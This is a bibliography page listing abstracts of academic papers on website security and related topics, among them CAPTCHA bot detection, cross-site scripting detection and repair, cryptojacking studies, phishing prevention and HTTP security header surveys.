Visible to the public Biblio

Found 100 results

Filters: Keyword is Web sites  [Clear All Filters]
2022-06-30
Arai, Tsuyoshi, Okabe, Yasuo, Matsumoto, Yoshinori.  2021.  Precursory Analysis of Attack-Log Time Series by Machine Learning for Detecting Bots in CAPTCHA. 2021 International Conference on Information Networking (ICOIN). :295—300.
CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is commonly utilized as a technology for avoiding attacks to Web sites by bots. State-of-the-art CAPTCHAs vary in difficulty based on the client's behavior, allowing for efficient bot detection without sacrificing simplicity. In this research, we focus on detecting bots by supervised machine learning from access-log time series in the past. We have analysed access logs to several Web services which are using a commercial cloud-based CAPTCHA service, Capy Puzzle CAPTCHA. Experiments show that bot detection in attacks over a month can be performed with high accuracy by precursory analysis of the access log in only the first day as training data. In addition, we have manually analyzed the data that are found to be False Positive in the discrimination results, and it is found that the proposed model actually detects access by bots, which had been overlooked in the first-stage manual discrimination of flags in preparation of training data.
2022-03-10
Gupta, Subhash Chand, Singh, Nidhi Raj, Sharma, Tulsi, Tyagi, Akshita, Majumdar, Rana.  2021.  Generating Image Captions using Deep Learning and Natural Language Processing. 2021 9th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO). :1—4.
In today's world, there is rapid progress in the field of artificial intelligence and image captioning. It becomes a fascinating task that has saw widespread interest. The task of image captioning comprises image description engendered based on the hybrid combination of deep learning, natural language processing, and various approaches of machine learning and computer vision. In this work authors emphasize on how the model generates a short description as an output of the input image using the functionalities of Deep Learning and Natural Language Processing, for helping visually impaired people, and can also be cast-off in various web sites to automate the generation of captions reducing the task of recitation with great ease.
2022-03-08
Gupta, Divya, Wadhwa, Shivani, Rani, Shalli.  2021.  On the Role of Named Data Networking for IoT Content Distribution. 2021 6th International Conference on Communication and Electronics Systems (ICCES). :544–549.
The initially designed internet aimed to create a communication network. The hosts share specific IP addresses to establish a communication channel to transfer messages. However, with the advancement of internet technologies as well as recent growth in various applications such as social networking, web sites, and number of smart phone users, the internet today act as distribution network. The content distribution for large volume traffic on internet mainly suffers from two issues 1) IP addresses allocation for each request message and 2) Real time content delivery. Moreover, users nowadays care only about getting data irrespective of its location. To meet need of the hour for content centric networking (CCN), Information centric networking (ICN) has been proposed as the future internet architecture. Named data networks (NDN) found its roots under the umbrella of ICN as one of its project to overcome the above listed issues. NDN is based on the technique of providing named data retrieval from intermediate nodes. This conceptual shift raises questions on its design, services and challenges. In this paper, we contribute by presenting architectural design of NDN with its routing and forwarding mechanism. Subsequently, we cover services offered by NDN for request-response message communication. Furthermore, the challenges faced by NDN for its implementation has been discussed in last.
2022-01-31
Baumann, Lukas, Heftrig, Elias, Shulman, Haya, Waidner, Michael.  2021.  The Master and Parasite Attack. 2021 51st Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN). :141—148.
We explore a new type of malicious script attacks: the persistent parasite attack. Persistent parasites are stealthy scripts, which persist for a long time in the browser's cache. We show to infect the caches of victims with parasite scripts via TCP injection. Once the cache is infected, we implement methodologies for propagation of the parasites to other popular domains on the victim client as well as to other caches on the network. We show how to design the parasites so that they stay long time in the victim's cache not restricted to the duration of the user's visit to the web site. We develop covert channels for communication between the attacker and the parasites, which allows the attacker to control which scripts are executed and when, and to exfiltrate private information to the attacker, such as cookies and passwords. We then demonstrate how to leverage the parasites to perform sophisticated attacks, and evaluate the attacks against a range of applications and security mechanisms on popular browsers. Finally we provide recommendations for countermeasures.
2021-06-01
Lu, Chang, Lei, Xiaochun, Xie, Junlin, Wang, Xiaolong, Mu, XiangBoge.  2020.  Panoptic Feature Pyramid Network Applications In Intelligent Traffic. 2020 16th International Conference on Computational Intelligence and Security (CIS). :40–43.
Intelligenta transportation is an important part of urban development. The core of realizing intelligent transportation is to master the urban road condition. This system processes the video of dashcam based on the Panoptic Segmentation network and adds a tracking module based on the comparison of front and rear frames and KM algorithm. The system mainly includes the following parts: embedded device, Panoptic Feature Pyramid Network, cloud server and Web site.
2021-03-18
Banday, M. T., Sheikh, S. A..  2020.  Improving Security Control of Text-Based CAPTCHA Challenges using Honeypot and Timestamping. 2020 Fourth International Conference on Computing Methodologies and Communication (ICCMC). :704—708.

The resistance to attacks aimed to break CAPTCHA challenges and the effectiveness, efficiency and satisfaction of human users in solving them called usability are the two major concerns while designing CAPTCHA schemes. User-friendliness, universality, and accessibility are related dimensions of usability, which must also be addressed adequately. With recent advances in segmentation and optical character recognition techniques, complex distortions, degradations and transformations are added to text-based CAPTCHA challenges resulting in their reduced usability. The extent of these deformations can be decreased if some additional security mechanism is incorporated in such challenges. This paper proposes an additional security mechanism that can add an extra layer of protection to any text-based CAPTCHA challenge, making it more challenging for bots and scripts that might be used to attack websites and web applications. It proposes the use of hidden text-boxes for user entry of CAPTCHA string which serves as honeypots for bots and automated scripts. The honeypot technique is used to trick bots and automated scripts into filling up input fields which legitimate human users cannot fill in. The paper reports implementation of honeypot technique and results of tests carried out over three months during which form submissions were logged for analysis. The results demonstrated great effectiveness of honeypots technique to improve security control and usability of text-based CAPTCHA challenges.

2021-02-10
Kerschbaumer, C., Ritter, T., Braun, F..  2020.  Hardening Firefox against Injection Attacks. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS PW). :653—663.
Web browsers display content in the form of HTML, CSS and JavaScript retrieved from the world wide web. The loaded content is subject to the web security model and considered untrusted and potentially malicious. To complicate security matters, Firefox uses the same technologies to render its user interface as it does to render untrusted web content which blurs the distinction between the two privilege levels.Getting interactions between the two correct turns out to be complicated and has led to numerous real-world security vulnerabilities. We study those vulnerabilities to discover common threats and explain how we address them systematically to harden Firefox.
Singh, M., Singh, P., Kumar, P..  2020.  An Analytical Study on Cross-Site Scripting. 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA). :1—6.
Cross-Site Scripting, also called as XSS, is a type of injection where malicious scripts are injected into trusted websites. When malicious code, usually in the form of browser side script, is injected using a web application to a different end user, an XSS attack is said to have taken place. Flaws which allows success to this attack is remarkably widespread and occurs anywhere a web application handles the user input without validating or encoding it. A study carried out by Symantic states that more than 50% of the websites are vulnerable to the XSS attack. Security engineers of Microsoft coined the term "Cross-Site Scripting" in January of the year 2000. But even if was coined in the year 2000, XSS vulnerabilities have been reported and exploited since the beginning of 1990's, whose prey have been all the (then) tech-giants such as Twitter, Myspace, Orkut, Facebook and YouTube. Hence the name "Cross-Site" Scripting. This attack could be combined with other attacks such as phishing attack to make it more lethal but it usually isn't necessary, since it is already extremely difficult to deal with from a user perspective because in many cases it looks very legitimate as it's leveraging attacks against our banks, our shopping websites and not some fake malicious website.
Varlioglu, S., Gonen, B., Ozer, M., Bastug, M..  2020.  Is Cryptojacking Dead After Coinhive Shutdown? 2020 3rd International Conference on Information and Computer Technologies (ICICT). :385—389.
Cryptojacking is the exploitation of victims' computer resources to mine for cryptocurrency using malicious scripts. It had become popular after 2017 when attackers started to exploit legal mining scripts, especially Coinhive scripts. Coinhive was actually a legal mining service that provided scripts and servers for in-browser mining activities. Nevertheless, over 10 million web users had been victims every month before the Coinhive shutdown that happened in Mar 2019. This paper explores the new era of the cryptojacking world after Coinhive discontinued its service. We aimed to see whether and how attackers continue cryptojacking, generate new malicious scripts, and developed new methods. We used a capable cryptojacking detector named CMTracker that proposed by Hong et al. in 2018. We automatically and manually examined 2770 websites that had been detected by CMTracker before the Coinhive shutdown. The results revealed that 99% of sites no longer continue cryptojacking. 1% of websites still run 8 unique mining scripts. By tracking these mining scripts, we detected 632 unique cryptojacking websites. Moreover, open-source investigations (OSINT) demonstrated that attackers still use the same methods. Therefore, we listed the typical patterns of cryptojacking. We concluded that cryptojacking is not dead after the Coinhive shutdown. It is still alive, but not as attractive as it used to be.
Tizio, G. Di, Ngo, C. Nam.  2020.  Are You a Favorite Target For Cryptojacking? A Case-Control Study On The Cryptojacking Ecosystem 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS PW). :515—520.
Illicitly hijacking visitors' computational resources for mining cryptocurrency via compromised websites is a consolidated activity.Previous works mainly focused on large-scale analysis of the cryptojacking ecosystem, technical means to detect browser-based mining as well as economic incentives of cryptojacking. So far, no one has studied if certain technical characteristics of a website can increase (decrease) the likelihood of being compromised for cryptojacking campaigns.In this paper, we propose to address this unanswered question by conducting a case-control study with cryptojacking websites obtained crawling the web using Minesweeper. Our preliminary analysis shows some association for certain website characteristics, however, the results obtained are not statistically significant. Thus, more data must be collected and further analysis must be conducted to obtain a better insight into the impact of these relations.
2021-02-03
Adil, M., Khan, R., Ghani, M. A. Nawaz Ul.  2020.  Preventive Techniques of Phishing Attacks in Networks. 2020 3rd International Conference on Advancements in Computational Sciences (ICACS). :1—8.

Internet is the most widely used technology in the current era of information technology and it is embedded in daily life activities. Due to its extensive use in everyday life, it has many applications such as social media (Face book, WhatsApp, messenger etc.,) and other online applications such as online businesses, e-counseling, advertisement on websites, e-banking, e-hunting websites, e-doctor appointment and e-doctor opinion. The above mentioned applications of internet technology makes things very easy and accessible for human being in limited time, however, this technology is vulnerable to various security threats. A vital and severe threat associated with this technology or a particular application is “Phishing attack” which is used by attacker to usurp the network security. Phishing attacks includes fake E-mails, fake websites, fake applications which are used to steal their credentials or usurp their security. In this paper, a detailed overview of various phishing attacks, specifically their background knowledge, and solutions proposed in literature to address these issues using various techniques such as anti-phishing, honey pots and firewalls etc. Moreover, installation of intrusion detection systems (IDS) and intrusion detection and prevention system (IPS) in the networks to allow the authentic traffic in an operational network. In this work, we have conducted end use awareness campaign to educate and train the employs in order to minimize the occurrence probability of these attacks. The result analysis observed for this survey was quite excellent by means of its effectiveness to address the aforementioned issues.

2021-01-15
Korolev, D., Frolov, A., Babalova, I..  2020.  Classification of Websites Based on the Content and Features of Sites in Onion Space. 2020 IEEE Conference of Russian Young Researchers in Electrical and Electronic Engineering (EIConRus). :1680—1683.
This paper describes a method for classifying onion sites. According to the results of the research, the most spread model of site in onion space is built. To create such a model, a specially trained neural network is used. The classification of neural network is based on five different categories such as using authentication system, corporate email, readable URL, feedback and type of onion-site. The statistics of the most spread types of websites in Dark Net are given.
2020-12-14
Ge, K., He, Y..  2020.  Detection of Sybil Attack on Tor Resource Distribution. 2020 IEEE International Conference on Power, Intelligent Computing and Systems (ICPICS). :328–332.
Tor anonymous communication system's resource publishing is vulnerable to enumeration attacks. Zhao determines users who requested resources are unavailable as suspicious malicious users, and gradually reduce the scope of suspicious users through several stages to reduce the false positive rate. However, it takes several stages to distinguish users. Although this method successfully detects the malicious user, the malicious user has acquired many resources in the previous stages, which reduce the availability of the anonymous communication system. This paper proposes a detection method based on Integer Linear Program to detect malicious users who perform enumeration attacks on resources in the process of resource distribution. First, we need construct a bipartite graph between the unavailable resources and the users who requested for these resources in the anonymous communication system; next we use Integer Linear Program to find the minimum malicious user set. We simulate the resource distribution process through computer program, we perform an experimental analysis of the method in this paper is carried out. Experimental results show that the accuracy of the method in this paper is above 80%, when the unavailable resources in the system account for no more than 50%. It is about 10% higher than Zhao's method.
Habibi, G., Surantha, N..  2020.  XSS Attack Detection With Machine Learning and n-Gram Methods. 2020 International Conference on Information Management and Technology (ICIMTech). :516–520.

Cross-Site Scripting (XSS) is an attack most often carried out by attackers to attack a website by inserting malicious scripts into a website. This attack will take the user to a webpage that has been specifically designed to retrieve user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors conducted a study by evaluating several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). The machine learning algorithm is then equipped with the n-gram method to each script feature to improve the detection performance of XSS attacks. The simulation results show that the SVM and n-gram method achieves the highest accuracy with 98%.

2020-11-23
Haddad, G. El, Aïmeur, E., Hage, H..  2018.  Understanding Trust, Privacy and Financial Fears in Online Payment. 2018 17th IEEE International Conference On Trust, Security And Privacy In Computing And Communications/ 12th IEEE International Conference On Big Data Science And Engineering (TrustCom/BigDataSE). :28–36.
In online payment, customers must transmit their personal and financial information through the website to conclude their purchase and pay the services or items selected. They may face possible fears from online transactions raised by their risk perception about financial or privacy loss. They may have concerns over the payment decision with the possible negative behaviors such as shopping cart abandonment. Therefore, customers have three major players that need to be addressed in online payment: the online seller, the payment page, and their own perception. However, few studies have explored these three players in an online purchasing environment. In this paper, we focus on the customer concerns and examine the antecedents of trust, payment security perception as well as their joint effect on two fundamentally important customers' aspects privacy concerns and financial fear perception. A total of 392 individuals participated in an online survey. The results highlight the importance, of the seller website's components (such as ease of use, security signs, and quality information) and their impact on the perceived payment security as well as their impact on customer's trust and financial fear perception. The objective of our study is to design a research model that explains the factors contributing to an online payment decision.
2020-11-20
Lavrenovs, A., Melón, F. J. R..  2018.  HTTP security headers analysis of top one million websites. 2018 10th International Conference on Cyber Conflict (CyCon). :345—370.
We present research on the security of the most popular websites, ranked according to Alexa's top one million list, based on an HTTP response headers analysis. For each of the domains included in the list, we made four different requests: an HTTP/1.1 request to the domain itself and to its "www" subdomain and two more equivalent HTTPS requests. Redirections were always followed. A detailed discussion of the request process and main outcomes is presented, including X.509 certificate issues and comparison of results with equivalent HTTP/2 requests. The body of the responses was discarded, and the HTTP response header fields were stored in a database. We analysed the prevalence of the most important response headers related to web security aspects. In particular, we took into account Strict- Transport-Security, Content-Security-Policy, X-XSS-Protection, X-Frame-Options, Set-Cookie (for session cookies) and X-Content-Type. We also reviewed the contents of response HTTP headers that potentially could reveal unwanted information, like Server (and related headers), Date and Referrer-Policy. This research offers an up-to-date survey of current prevalence of web security policies implemented through HTTP response headers and concludes that most popular sites tend to implement it noticeably more often than less popular ones. Equally, HTTPS sites seem to be far more eager to implement those policies than HTTP only websites. A comparison with previous works show that web security policies based on HTTP response headers are continuously growing, but still far from satisfactory widespread adoption.
2020-11-04
Khurana, N., Mittal, S., Piplai, A., Joshi, A..  2019.  Preventing Poisoning Attacks On AI Based Threat Intelligence Systems. 2019 IEEE 29th International Workshop on Machine Learning for Signal Processing (MLSP). :1—6.

As AI systems become more ubiquitous, securing them becomes an emerging challenge. Over the years, with the surge in online social media use and the data available for analysis, AI systems have been built to extract, represent and use this information. The credibility of this information extracted from open sources, however, can often be questionable. Malicious or incorrect information can cause a loss of money, reputation, and resources; and in certain situations, pose a threat to human life. In this paper, we use an ensembled semi-supervised approach to determine the credibility of Reddit posts by estimating their reputation score to ensure the validity of information ingested by AI systems. We demonstrate our approach in the cybersecurity domain, where security analysts utilize these systems to determine possible threats by analyzing the data scattered on social media websites, forums, blogs, etc.

2020-10-16
Gaio Rito, Cátia Sofia, Beatriz Piedade, Maria, Eugénio Lucas, Eugénio.  2019.  E-Government - Qualified Digital Signature Case Study. 2019 14th Iberian Conference on Information Systems and Technologies (CISTI). :1—6.

This paper presents a case study on the use and implementation of the Qualified Digital Signature. Problematics such as the degree of use, security and authenticity of Qualified Digital Signature and the publication and dissemination of documents signed in digital format are analyzed. In order to support the case study, a methodology was adopted that included interviews with municipalities that are part of the Intermunicipal Community of the region of Leiria and a computer application was developed that allowed to analyze the documents available in the institutional websites of the municipalities, the ones that were digitally signed. The results show that institutional websites are already providing documentation with Qualified Digital Signature and that the level of trust and authenticity regarding their use is considered to be mostly very positive.

Shayganmehr, Masoud, Montazer, Gholam Ali.  2019.  Identifying Indexes Affecting the Quality of E-Government Websites. 2019 5th International Conference on Web Research (ICWR). :167—171.

With the development of new technologies in the world, governments have tendency to make a communications with people and business with the help of such technologies. Electronic government (e-government) is defined as utilizing information technologies such as electronic networks, Internet and mobile phones by organizations and state institutions in order to making wide communication between citizens, business and different state institutions. Development of e-government starts with making website in order to share information with users and is considered as the main infrastructure for further development. Website assessment is considered as a way for improving service quality. Different international researches have introduced various indexes for website assessment, they only see some dimensions of website in their research. In this paper, the most important indexes for website quality assessment based on accurate review of previous studies are "Web design", "navigation", services", "maintenance and Support", "Citizens Participation", "Information Quality", "Privacy and Security", "Responsiveness", "Usability". Considering mentioned indexes in designing the website facilitates user interaction with the e-government websites.

2020-09-28
Lv, Chengcheng, Zhang, Long, Zeng, Fanping, Zhang, Jian.  2019.  Adaptive Random Testing for XSS Vulnerability. 2019 26th Asia-Pacific Software Engineering Conference (APSEC). :63–69.
XSS is one of the common vulnerabilities in web applications. Many black-box testing tools may collect a large number of payloads and traverse them to find a payload that can be successfully injected, but they are not very efficient. And previous research has paid less attention to how to improve the efficiency of black-box testing to detect XSS vulnerability. To improve the efficiency of testing, we develop an XSS testing tool. It collects 6128 payloads and uses a headless browser to detect XSS vulnerability. The tool can discover XSS vulnerability quickly with the ART(Adaptive Random Testing) method. We conduct an experiment using 3 extensively adopted open source vulnerable benchmarks and 2 actual websites to evaluate the ART method. The experimental results indicate that the ART method can effectively improve the fuzzing method by more than 27.1% in reducing the number of attempts before accomplishing a successful injection.
Mohammadi, Mahmoud, Chu, Bill, Richter Lipford, Heather.  2019.  Automated Repair of Cross-Site Scripting Vulnerabilities through Unit Testing. 2019 IEEE International Symposium on Software Reliability Engineering Workshops (ISSREW). :370–377.
Many web applications are vulnerable to Cross Site Scripting (XSS) attacks enabling attackers to steal sensitive information and commit frauds. Much research in this area have focused on detecting vulnerable web pages using static and dynamic program analysis. The best practice to prevent XSS vulnerabilities is to encode untrusted dynamic content. However, a common programming error is the use of a wrong type of encoder to sanitize untrusted data, leaving the application vulnerable. We propose a new approach that can automatically fix this common type of XSS vulnerability in many situations. This approach is integrated into the software maintenance life cycle through unit testing. Vulnerable codes are refactored to reflect the suggested encoder and then verified using an attack evaluating mechanism to find a proper repair. Evaluation of this approach has been conducted on an open source medical record application with over 200 web pages written in JSP.
2020-09-11
Shekhar, Heemany, Moh, Melody, Moh, Teng-Sheng.  2019.  Exploring Adversaries to Defend Audio CAPTCHA. 2019 18th IEEE International Conference On Machine Learning And Applications (ICMLA). :1155—1161.
CAPTCHA is a web-based authentication method used by websites to distinguish between humans (valid users) and bots (attackers). Audio captcha is an accessible captcha meant for the visually disabled section of users such as color-blind, blind, near-sighted users. Firstly, this paper analyzes how secure current audio captchas are from attacks using machine learning (ML) and deep learning (DL) models. Each audio captcha is made up of five, seven or ten random digits[0-9] spoken one after the other along with varying background noise throughout the length of the audio. If the ML or DL model is able to correctly identify all spoken digits and in the correct order of occurance in a single audio captcha, we consider that captcha to be broken and the attack to be successful. Throughout the paper, accuracy refers to the attack model's success at breaking audio captchas. The higher the attack accuracy, the more unsecure the audio captchas are. In our baseline experiments, we found that attack models could break audio captchas that had no background noise or medium background noise with any number of spoken digits with nearly 99% to 100% accuracy. Whereas, audio captchas with high background noise were relatively more secure with attack accuracy of 85%. Secondly, we propose that the concepts of adversarial examples algorithms can be used to create a new kind of audio captcha that is more resilient towards attacks. We found that even after retraining the models on the new adversarial audio data, the attack accuracy remained as low as 25% to 36% only. Lastly, we explore the benefits of creating adversarial audio captcha through different algorithms such as Basic Iterative Method (BIM) and deepFool. We found that as long as the attacker has less than 45% sample from each kinds of adversarial audio datasets, the defense will be successful at preventing attacks.
2020-09-04
Moe, Khin Su Myat, Win, Thanda.  2018.  Enhanced Honey Encryption Algorithm for Increasing Message Space against Brute Force Attack. 2018 15th International Conference on Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON). :86—89.
In the era of digitization, data security is a vital role in message transmission and all systems that deal with users require stronger encryption techniques that against brute force attack. Honey encryption (HE) algorithm is a user data protection algorithm that can deceive the attackers from unauthorized access to user, database and websites. The main part of conventional HE is distribution transforming encoder (DTE). However, the current DTE process using cumulative distribution function (CDF) has the weakness in message space limitation because CDF cannot solve the probability theory in more than four messages. So, we propose a new method in DTE process using discrete distribution function in order to solve message space limitation problem. In our proposed honeywords generation method, the current weakness of existing honeywords generation method such as storage overhead problem can be solved. In this paper, we also describe the case studies calculation of DTE in order to prove that new DTE process has no message space limitation and mathematical model using discrete distribution function for DTE process facilitates the distribution probability theory.
2020-07-13
Agrawal, Shriyansh, Sanagavarapu, Lalit Mohan, Reddy, YR.  2019.  FACT - Fine grained Assessment of web page CredibiliTy. TENCON 2019 - 2019 IEEE Region 10 Conference (TENCON). :1088–1097.
With more than a trillion web pages, there is a plethora of content available for consumption. Search Engine queries invariably lead to overwhelming information, parts of it relevant and some others irrelevant. Often the information provided can be conflicting, ambiguous, and inconsistent contributing to the loss of credibility of the content. In the past, researchers have proposed approaches for credibility assessment and enumerated factors influencing the credibility of web pages. In this work, we detailed a WEBCred framework for automated genre-aware credibility assessment of web pages. We developed a tool based on the proposed framework to extract web page features instances and identify genre a web page belongs to while assessing it's Genre Credibility Score ( GCS). We validated our approach on `Information Security' dataset of 8,550 URLs with 171 features across 7 genres. The supervised learning algorithm, Gradient Boosted Decision Tree classified genres with 88.75% testing accuracy over 10 fold cross-validation, an improvement over the current benchmark. We also examined our approach on `Health' domain web pages and had comparable results. The calculated GCS correlated 69% with crowdsourced Web Of Trust ( WOT) score and 13% with algorithm based Alexa ranking across 5 Information security groups. This variance in correlation states that our GCS approach aligns with human way ( WOT) as compared to algorithmic way (Alexa) of web assessment in both the experiments.
2020-07-10
Yulianto, Arief Dwi, Sukarno, Parman, Warrdana, Aulia Arif, Makky, Muhammad Al.  2019.  Mitigation of Cryptojacking Attacks Using Taint Analysis. 2019 4th International Conference on Information Technology, Information Systems and Electrical Engineering (ICITISEE). :234—238.

Cryptojacking (also called malicious cryptocurrency mining or cryptomining) is a new threat model using CPU resources covertly “mining” a cryptocurrency in the browser. The impact is a surge in CPU Usage and slows the system performance. In this research, in-browsercryptojacking mitigation has been built as an extension in Google Chrome using Taint analysis method. The method used in this research is attack modeling with abuse case using the Man-In-The-Middle (MITM) attack as a testing for mitigation. The proposed model is designed so that users will be notified if a cryptojacking attack occurs. Hence, the user is able to check the script characteristics that run on the website background. The results of this research show that the taint analysis is a promising method to mitigate cryptojacking attacks. From 100 random sample websites, the taint analysis method can detect 19 websites that are infcted by cryptojacking.